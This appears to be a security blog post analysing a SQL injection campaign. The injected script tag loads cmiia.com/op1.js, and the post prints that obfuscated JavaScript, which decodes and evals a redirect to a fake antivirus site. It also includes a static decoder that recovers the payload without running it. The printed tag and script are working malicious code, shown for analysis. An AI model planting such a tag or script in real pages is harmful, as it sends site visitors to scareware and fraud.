cmiia.com/op1.js

Just discovered a SQL injection that is very different from the past mass attacks.
The injected tag has this form:
<script src="http://cmiia.com/op1.js"=[some random URLs]>[some associated word with URL]</script>
For example:
<script src="http://cmiia.com/op1.js"=http://groups.msn.com/BestHomeEquityLineOfCredit/>home equity line of credit</script>

The op1.js is as follows:
var ptitle = document.title;
var atpos = ptitle.indexOf("-");
if (atpos > -1) {
ptitle = ptitle.substring(atpos+2, ptitle.length);
}

var tt; var kk; var mm; kk=""; tt="w|nd^w$l^c#[|^n;'([[*)!!b#nd#[>#m$com!|n$cg|]4{*#r#m>[>r;";

for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm=="(") mm="h"; if (mm=="*") mm="p"; if (mm=="!") mm="/"; if (mm==">") mm="e";if (mm=="$") mm=".";
if (mm=="[") mm="t"; if (mm=="#") mm="a"; if (mm=="^") mm="o"; if (mm=="]") mm="?"; if (mm=="@") mm="k";
if (mm=="{") mm="&"; if (mm==")") mm=":"; if (mm==";") mm="="; if (mm=="|") mm="i"; if (mm==" ") mm="+"; kk=kk+mm; }
kk += ptitle + "';";
eval (kk);

The op1.js decodes to:
window.location='http://bandateam.com/in.cgi?4&parameter=document.title';
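
The decoding above can be reproduced without running the script. The following is an added example, not part of the original post: it reads the substitution rules and the encoded string out of the op1.js source quoted above, so it also handles a variant with a different table, and rebuilds the statement that would be passed to eval(). The function names and the placeholder page title are assumptions of this example.

```javascript
// Static decoder for op1.js-style substitution obfuscation: recovers the
// statement that the script would pass to eval() without executing it.

// Sample input: the obfuscated portion of op1.js as quoted in the post above.
const SAMPLE = String.raw`
var tt; var kk; var mm; kk=""; tt="w|nd^w$l^c#[|^n;'([[*)!!b#nd#[>#m$com!|n$cg|]4{*#r#m>[>r;";
for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm=="(") mm="h"; if (mm=="*") mm="p"; if (mm=="!") mm="/"; if (mm==">") mm="e";if (mm=="$") mm=".";
if (mm=="[") mm="t"; if (mm=="#") mm="a"; if (mm=="^") mm="o"; if (mm=="]") mm="?"; if (mm=="@") mm="k";
if (mm=="{") mm="&"; if (mm==")") mm=":"; if (mm==";") mm="="; if (mm=="|") mm="i"; if (mm==" ") mm="+"; kk=kk+mm; }
kk += ptitle + "';";
`;

// Pull the substitution table out of the if-chain, in source order.
function extractTable(src) {
  const rule = /if\s*\(\s*mm\s*==\s*"(.)"\s*\)\s*mm\s*=\s*"(.)"\s*;/g;
  return [...src.matchAll(rule)].map((m) => [m[1], m[2]]);
}

// Pull the encoded string literal assigned to tt.
function extractEncoded(src) {
  const m = /\btt\s*=\s*"([^"]*)"\s*;/.exec(src);
  if (!m) throw new Error("no tt string literal found");
  return m[1];
}

// Apply the rules to each character the way the original loop does:
// sequentially, so an earlier rule's output can be rewritten by a later one.
function decode(src, pageTitle = "<document.title>") {
  const table = extractTable(src);
  if (table.length === 0) throw new Error("no substitution rules found");
  let out = "";
  for (const ch of extractEncoded(src)) {
    let mm = ch;
    for (const [from, to] of table) if (mm === from) mm = to;
    out += mm;
  }
  return out + pageTitle + "';"; // mirrors: kk += ptitle + "';"
}

// Extract the host of the first http(s) URL in the decoded statement.
function redirectHost(statement) {
  const m = /https?:\/\/[^\s'"]+/.exec(statement);
  return m ? new URL(m[0]).hostname : null;
}

console.log(decode(SAMPLE));
console.log(redirectHost(decode(SAMPLE)));
```
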

When retrieved, the above URL was redirected to the following URL:
http://antivirus-scanonline.com/1/?xx=1&in=2&h=1&ag=2&end=1&g=1&aid=dogma&affid=182

Looks like it is one of those fakealert sites typically associated with RBN.
